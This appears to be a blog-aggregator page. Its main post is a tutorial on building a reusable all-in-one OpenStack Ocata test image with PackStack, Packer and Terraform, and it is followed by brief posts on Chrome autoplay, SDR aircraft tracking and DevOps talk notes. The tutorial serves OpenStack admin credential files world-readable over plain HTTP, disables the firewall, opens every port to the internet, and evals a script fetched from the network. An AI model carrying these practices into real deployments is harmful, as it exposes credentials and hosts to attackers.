However, in order to more easily make the OpenStack environment run correctly each time a virtual machine is created, the installation needs to be tuned. To do this, a custom "answer file" will be used when running PackStack.

An answer file is a file which contains each configurable setting within PackStack. This file is very large with lots of options. It's not something you want to write from scratch. Instead, PackStack can generate an answer file to be used as a template.

On a CentOS 7 virtual machine, which can even be the same virtual machine you created in Part 1, run:

$ packstack --gen-answer-file=packstack-answers.txt

Copy the file to your workstation using scp or some other means. Make a directory called files to store this answer file:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir packer/files
$ scp -i key/id_rsa centos@<ip>:packstack-answers.txt packer/files

Once stored locally, make the following changes:

First, locate the setting CONFIG_CONTROLLER_HOST. This setting will have the value of an IP address local to the virtual machine which generated this file:

CONFIG_CONTROLLER_HOST=10.41.8.200

Do a global search and replace of 10.41.8.200 with 127.0.0.1.
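One way to do that replace from the command line (the sample line below stands in for the real packer/files/packstack-answers.txt, and the IP PackStack generated will differ on your machine):

```shell
# Replace the generated host IP with 127.0.0.1 throughout the answer file.
echo 'CONFIG_CONTROLLER_HOST=10.41.8.200' > /tmp/packstack-answers.txt
sed -i 's/10\.41\.8\.200/127.0.0.1/g' /tmp/packstack-answers.txt
cat /tmp/packstack-answers.txt   # CONFIG_CONTROLLER_HOST=127.0.0.1
```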

Next, use this opportunity to tune which services you want to enable for your test environment. For example:

- CONFIG_HORIZON_INSTALL=y
+ CONFIG_HORIZON_INSTALL=n
- CONFIG_CEILOMETER_INSTALL=y
+ CONFIG_CEILOMETER_INSTALL=n
- CONFIG_AODH_INSTALL=y
+ CONFIG_AODH_INSTALL=n
- CONFIG_GNOCCHI_INSTALL=y
+ CONFIG_GNOCCHI_INSTALL=n
- CONFIG_LBAAS_INSTALL=n
+ CONFIG_LBAAS_INSTALL=y
- CONFIG_NEUTRON_FWAAS=n
+ CONFIG_NEUTRON_FWAAS=y

These are all services I have personally changed the status of since either they are disabled by default and I want them enabled or they are enabled by default and I do not need them. Change the values to suit your needs.

You might notice that there are several embedded passwords and secrets in this answer file. Astute readers will realize that these passwords will all be used for every virtual machine created with this answer file. For production use, this is most definitely not secure. However, I consider this relatively safe since these OpenStack environments are temporary and only for testing.
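To see just how many secrets are involved, the answer file can be grepped; PackStack's password keys follow a CONFIG_*_PW naming convention. A sketch (the sample lines stand in for the real file):

```shell
# List the password settings baked into an answer file.
# The printf lines are a stand-in for a real packstack-answers.txt.
printf 'CONFIG_KEYSTONE_ADMIN_PW=secret1\nCONFIG_DEBUG_MODE=n\nCONFIG_MARIADB_PW=secret2\n' > /tmp/answers.txt
grep -E '^CONFIG_.*_PW=' /tmp/answers.txt
```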

Installing OpenStack

Next, begin building a deploy.sh script. You can re-use the deploy.sh script from Part 1 as a start, with one initial change:

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
- packstack --allinone
+ packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

Next, alter packer/openstack/build.json with the following:


  {
    "builders": [{
      "type": "openstack",
      "image_name": "packstack-ocata",
      "reuse_ips": true,
      "ssh_username": "centos",

      "flavor": "{{user `flavor`}}",
      "security_groups": ["{{user `secgroup`}}"],
      "source_image": "{{user `image_id`}}",
      "floating_ip_pool": "{{user `pool`}}",
      "networks": ["{{user `network_id`}}"]
-   }]
+   }],
+   "provisioners": [
+     {
+       "type": "file",
+       "source": "../files",
+       "destination": "/home/centos/files"
+     },
+     {
+       "type": "shell",
+       "inline": [
+         "sudo bash /home/centos/files/deploy.sh"
+       ]
+     }
+   ]
  }

There are two provisioners being created here: one which will copy the files directory to /home/centos/files and one to run the deploy.sh script.

files was created outside of the openstack directory because these files are not unique to OpenStack. You can use the same files to build images in other clouds. For example, create a packer/aws directory and create a similar build.json file for AWS.
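For example, a packer/aws/build.json using Packer's amazon-ebs builder might look something like this (a sketch; the builder field names are standard amazon-ebs options, the user variables are placeholders you would supply, and AWS credentials are assumed to come from the environment):

```json
{
  "builders": [{
    "type": "amazon-ebs",
    "ami_name": "packstack-ocata",
    "ssh_username": "centos",

    "instance_type": "{{user `instance_type`}}",
    "region": "{{user `region`}}",
    "source_ami": "{{user `source_ami`}}"
  }],
  "provisioners": [
    {
      "type": "file",
      "source": "../files",
      "destination": "/home/centos/files"
    },
    {
      "type": "shell",
      "inline": [
        "sudo bash /home/centos/files/deploy.sh"
      ]
    }
  ]
}
```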

With that in place, run… actually, don't run yet. I'll save you a step. While the current configuration will launch an instance, install an all-in-one OpenStack environment, and create a snapshot, OpenStack will not work correctly when you create a virtual machine based on that image.

In order for it to work, a few more modifications need to be made to ensure OpenStack starts correctly on a new virtual machine.

Removing Unique Data

In order to remove the unique data of the OpenStack environment, add the following to deploy.sh:

+ hostnamectl set-hostname localhost
+
  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF
+
+ systemctl stop openstack-cinder-backup.service
+ systemctl stop openstack-cinder-scheduler.service
+ systemctl stop openstack-cinder-volume.service
+ systemctl stop openstack-nova-cert.service
+ systemctl stop openstack-nova-compute.service
+ systemctl stop openstack-nova-conductor.service
+ systemctl stop openstack-nova-consoleauth.service
+ systemctl stop openstack-nova-novncproxy.service
+ systemctl stop openstack-nova-scheduler.service
+ systemctl stop neutron-dhcp-agent.service
+ systemctl stop neutron-l3-agent.service
+ systemctl stop neutron-lbaasv2-agent.service
+ systemctl stop neutron-metadata-agent.service
+ systemctl stop neutron-openvswitch-agent.service
+ systemctl stop neutron-metering-agent.service
+
+ mysql -e "update services set deleted_at=now(), deleted=id" cinder
+ mysql -e "update services set deleted_at=now(), deleted=id" nova
+ mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
+ for i in $(openstack network agent list -c ID -f value); do
+   neutron agent-delete $i
+ done
+
+ systemctl stop httpd

The above added three pieces to deploy.sh: setting the hostname to localhost, stopping all OpenStack services, and deleting all known service and agent records for Cinder, Nova, and Neutron.

Now, with the above in place, run… no, not yet, either.

Remember the last step outlined in the beginning of this post:

Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

How is the new virtual machine going to configure itself with new information? One solution is to create an rc.local file and place it in the /etc directory during the Packer provisioning phase. This way, when the virtual machine launches, rc.local is triggered and acts as a post-boot script.

Adding an rc.local File

First, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

+ cp /home/centos/files/rc.local /etc
+ chmod +x /etc/rc.local

Next, create a file called rc.local inside the packstack/files directory:

#!/bin/bash
set -x

export HOME=/root

sleep 60

systemctl restart rabbitmq-server
while [[ true ]]; do
  pgrep -f rabbit
  if [[ $? == 0 ]]; then
    break
  fi
  sleep 10
  systemctl restart rabbitmq-server
done

nova-manage cell_v2 discover_hosts

The above is pretty simple: it restarts RabbitMQ and runs nova-manage so the node re-discovers itself as a compute node.

Why restart RabbitMQ? I have no idea. I've found it needs to be done for OpenStack to work correctly.
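As an aside, the restart-and-poll loop above can be factored into a small retry helper. This is just a sketch (`wait_for` is a name I made up, not something in the original scripts):

```shell
#!/bin/bash
# Retry a command until it succeeds, up to a fixed number of attempts.
wait_for() {
  local tries=$1
  shift
  local i
  for ((i = 0; i < tries; i++)); do
    if "$@"; then
      return 0
    fi
    sleep 1
  done
  return 1
}

# e.g. the RabbitMQ wait could become:
#   until wait_for 6 pgrep -f rabbit; do systemctl restart rabbitmq-server; done
wait_for 3 true && echo "up"
```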

I also mentioned that I'd show how to access the OpenStack services from outside the virtual machine, so you don't have to log in to it to run tests.

To do that, add the following to rc.local:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

+ public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
+ if [[ -n $public_ip ]]; then
+   while true ; do
+     mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
+     if [[ $? == 0 ]]; then
+       break
+     fi
+     sleep 10
+   done

+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
+ fi

  systemctl restart rabbitmq-server
  while [[ true ]]; do
    pgrep -f rabbit
    if [[ $? == 0 ]]; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

+ systemctl restart openstack-cinder-api.service
+ systemctl restart openstack-cinder-backup.service
+ systemctl restart openstack-cinder-scheduler.service
+ systemctl restart openstack-cinder-volume.service
+ systemctl restart openstack-nova-cert.service
+ systemctl restart openstack-nova-compute.service
+ systemctl restart openstack-nova-conductor.service
+ systemctl restart openstack-nova-consoleauth.service
+ systemctl restart openstack-nova-novncproxy.service
+ systemctl restart openstack-nova-scheduler.service
+ systemctl restart neutron-dhcp-agent.service
+ systemctl restart neutron-l3-agent.service
+ systemctl restart neutron-lbaasv2-agent.service
+ systemctl restart neutron-metadata-agent.service
+ systemctl restart neutron-openvswitch-agent.service
+ systemctl restart neutron-metering-agent.service
+ systemctl restart httpd

  nova-manage cell_v2 discover_hosts

+ iptables -I INPUT -p tcp --dport 80 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
+ cp /root/keystonerc* /var/www/html
+ chmod 666 /var/www/html/keystonerc*

Three steps have been added above:

The first uses the metadata service to discover the virtual machine's public IP. Once the public IP is known, the endpoint table in the keystone database is updated with it. By default, PackStack sets the endpoints of the Keystone catalog to 127.0.0.1. This prevents any interaction with OpenStack from outside the virtual machine. Changing it to the public IP resolves this issue.

The keystonerc_demo and keystonerc_admin files are also updated with the public IP.

Why not just set the public IP in the PackStack answer file? Because the public IP isn't known until the virtual machine launches, which is after PackStack has run. And that's why 127.0.0.1 was used earlier: it's an easy placeholder to search and replace, and it still produces a working (if local-only) OpenStack environment if it's never replaced.
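To see the placeholder swap in isolation, here's a tiny sketch run against a scratch file (203.0.113.10 is a documentation IP standing in for the real public address, and the OS_AUTH_URL line is just a representative keystonerc entry):

```shell
#!/bin/bash
# Simulate the endpoint fix-up that rc.local performs on the keystonerc files.
public_ip=203.0.113.10          # rc.local obtains this from the metadata service
scratch=$(mktemp)
echo 'export OS_AUTH_URL=http://127.0.0.1:5000/v3' > "$scratch"
sed -i -e "s/127.0.0.1/$public_ip/g" "$scratch"
cat "$scratch"                  # export OS_AUTH_URL=http://203.0.113.10:5000/v3
rm -f "$scratch"
```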

The second step restarts all OpenStack services so they're aware of the new endpoints.

The third step copies the keystonerc_demo and keystonerc_admin files to /var/www/html/. This way, you can wget the files from http://public-ip/keystonerc_demo and http://public-ip/keystonerc_admin and save them to your workstation. You can then source them and begin interacting with OpenStack remotely.

Now, with all of that in place, re-run Packer:

$ pwd
/home/jtopjian/terraform-openstack-test/packer/openstack
$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Using the Image

When the build is complete, you will have a new image called packstack-ocata that you can create a virtual machine with.

As an example, you can use Terraform to launch the image:

variable "key_name" {}
variable "network_id" {}

variable "pool" {
  default = "public"
}

variable "flavor" {
  default = "m1.xlarge"
}

data "openstack_images_image_v2" "packstack" {
  name        = "packstack-ocata"
  most_recent = true
}

resource "random_id" "security_group_name" {
  prefix      = "openstack_test_instance_allow_all_"
  byte_length = 8
}

resource "openstack_networking_floatingip_v2" "openstack_acc_tests" {
  pool = "${var.pool}"
}

resource "openstack_networking_secgroup_v2" "openstack_acc_tests" {
  name        = "${random_id.security_group_name.hex}"
  description = "Rules for openstack acceptance tests"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_1" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_2" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_3" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_4" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_5" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "icmp"
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_6" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "icmp"
  remote_ip_prefix  = "::/0"
}

resource "openstack_compute_instance_v2" "openstack_acc_tests" {
  name            = "openstack_acc_tests"
  image_id        = "${data.openstack_images_image_v2.packstack.id}"
  flavor_name     = "${var.flavor}"
  key_pair        = "${var.key_name}"
  security_groups = ["${openstack_networking_secgroup_v2.openstack_acc_tests.name}"]

  network {
    uuid = "${var.network_id}"
  }
}

resource "openstack_compute_floatingip_associate_v2" "openstack_acc_tests" {
  instance_id = "${openstack_compute_instance_v2.openstack_acc_tests.id}"
  floating_ip = "${openstack_networking_floatingip_v2.openstack_acc_tests.address}"
}

resource "null_resource" "rc_files" {
  provisioner "local-exec" {
    command = <<EOF
      while true ; do
        wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_demo 2> /dev/null
        if [ $? = 0 ]; then
          break
        fi
        sleep 20
      done

      wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_admin
    EOF
  }
}

The above Terraform configuration will do the following:

  1. Search for the latest image titled "packstack-ocata".
  2. Create a floating IP.
  3. Create a security group with a unique name and six rules to allow all TCP, UDP, and ICMP traffic.
  4. Launch an instance using the "packstack-ocata" image.
  5. Associate the floating IP to the instance.
  6. Poll the instance every 20 seconds to see if http://publicip/keystonerc_demo is available. When it is available, download it, along with keystonerc_admin.

To run this Terraform configuration, do:

$ terraform apply \
    -var "key_name=<keypair name>" \
    -var "network_id=<network uuid>" \
    -var "pool=<pool name>" \
    -var "flavor=<flavor name>"

Conclusion

This blog post detailed how to create a reusable image with OpenStack Ocata already installed. This allows you to create a standard testing environment in a fraction of the time that it takes to build the environment from scratch.

October 07, 2017 06:00 AM

October 05, 2017

The Lone Sysadmin

Stop Chrome Autoplay

If you didn’t catch this on Twitter: If you use Google Chrome, go to chrome://flags/#autoplay-policy and set it to “Document user activation is required.” Boom: no more auto-playing videos. You’re welcome. — Chris Meadows (@robotech_master) October 3, 2017 In short, go to chrome://flags/#autoplay-policy and set it to “Document user activation is required.” It’s funny how simple things […]


by Bob Plankers at October 05, 2017 04:35 PM

October 04, 2017

Steve Kemp's Blog

Tracking aircraft in real-time, via software-defined-radio

So my last blog-post was about creating a digital-radio, powered by an ESP8266 device, there's a joke there about wireless-control of a wireless. I'm not going to make it.

Sticking with a theme this post is also about radio, software-defined radio. I know almost nothing about SDR, except that it can be used to let your computer "do stuff" with radio. The only application I've ever read about that seemed interesting was tracking aircraft.

This post is about setting up a Debian GNU/Linux system to do exactly that: show aircraft in real-time above your head! This was almost painless to set up.

  • Buy the hardware.
  • Plug in the hardware.
  • Confirm it is detected.
  • Install the appropriate sdr development-package(s).
  • Install the magic software.
    • Written by @antirez, no less, you know it is gonna be good!

So I bought this USB device from AliExpress for the grand total of €8.46. I have no idea if that URL is stable, but I suspect it is probably not. Good luck finding something similar if you're living in the future!

Once I connected the antenna to the USB stick and inserted it into a spare slot, it showed up in the output of lsusb:

  $ lsusb
  ..
  Bus 003 Device 043: ID 0bda:2838 Realtek Semiconductor Corp. RTL2838 DVB-T
  ..

In more detail I see the major/minor numbers:

  idVendor           0x0bda Realtek Semiconductor Corp.
  idProduct          0x2838 RTL2838 DVB-T

So far, so good. I installed the development headers/library I needed:

  # apt-get install librtlsdr-dev libusb-1.0-0-dev

Once that was done I could clone antirez's repository, and build it:

  $ git clone https://github.com/antirez/dump1090.git
  $ cd dump1090
  $ make

And run it:

  $ sudo ./dump1090 --interactive --net

This failed initially as a kernel-module had claimed the device, but removing that was trivial:

  $ sudo rmmod dvb_usb_rtl28xxu
  $ sudo ./dump1090 --interactive --net

Once it was running I'd see live updates on the console, every second:

  Hex    Flight   Altitude  Speed   Lat       Lon       Track  Messages Seen       .
  --------------------------------------------------------------------------------
  4601fc          14200     0       0.000     0.000     0     11        1 sec
  4601f2          9550      0       0.000     0.000     0     58        0 sec
  45ac52 SAS1716  2650      177     60.252    24.770    47    26        1 sec

And opening a browser pointing at http://localhost:8080/ would show that graphically, like so:

NOTE: In this view I'm in Helsinki, and the airport is at Vantaa, just outside the city.

Of course there are tweaks to be made:

  • With the right udev-rules in place it is possible to run the tool as non-root, and blacklist the default kernel module.
  • There are other forks of the dump1090 software that are more up-to-date to explore.
  • SDR can do more than track planes.

October 04, 2017 09:00 PM

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 3

Sanjeev Sharma – When DevOps met SRE: From Apollo 13 to Google SRE

  • Author of two DevOps books
  • Apollo 13
    • Who were the real heroes? The guys back at mission control. The astronauts just had to keep breathing and not die
  • Best Practice for Incident management
    • Prioritize
    • Prepare
    • Trust
    • Introspect
    • Consider Alternatives
    • Practice
    • Change it around
  • Big Hurdles to adoption of DevOps in Enterprise
    • Literature is Only looking at one delivery platform at a time
    • Big enterprise have hundreds of platforms with completely different technologies, maturity levels, speeds. All interdependent
    • He Divides
      • Industrialised Core – Value High, Risk Low, MTBF
      • Agile/Innovation Edge – Value Low, Risk High, Rapid change and delivery, MTTR
      • Need normal distribution curve of platforms across this range
      • Need to be able to maintain products at both ends in one IT organisation
  • 6 capabilities needed in IT Organisation
    • Planning and architecture.
      • Your Delivery pipeline will be as fast as the slowest delivery pipeline it is dependent on
    • APIs
      • Modernizing to Microservices based architecture: Refactoring code and data and defining the APIs
    • Application Deployment Automation and Environment Orchestration
